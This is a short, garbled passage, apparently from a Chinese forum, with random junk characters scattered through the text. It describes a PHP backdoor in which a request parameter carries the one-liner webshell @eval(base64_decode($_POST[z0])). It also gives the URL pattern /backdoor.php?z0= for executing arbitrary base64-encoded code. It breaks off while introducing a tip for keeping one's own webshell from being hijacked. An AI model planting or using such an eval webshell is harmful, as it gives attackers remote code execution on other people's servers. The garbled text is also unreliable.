i* {1 F5 [: }) _4 c因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0])); 7 v# l- L E2 o* b. S5 ~0 u& w# E. g. @4 a) |6 C9 E2 @; n' i
直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了; Q( f* W* D) p. e. l! z
7 |- s& s, M( h' B4 L2 s) G: o不知道是设计缺陷还是故意留的后门7 t, v- L2 ]4 f3 Y( z9 Z$ A. `7 W
6 s; V9 h& F( m; g: u8 N/ Q5 F. w
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用: S2 n7 n2 g+ e- u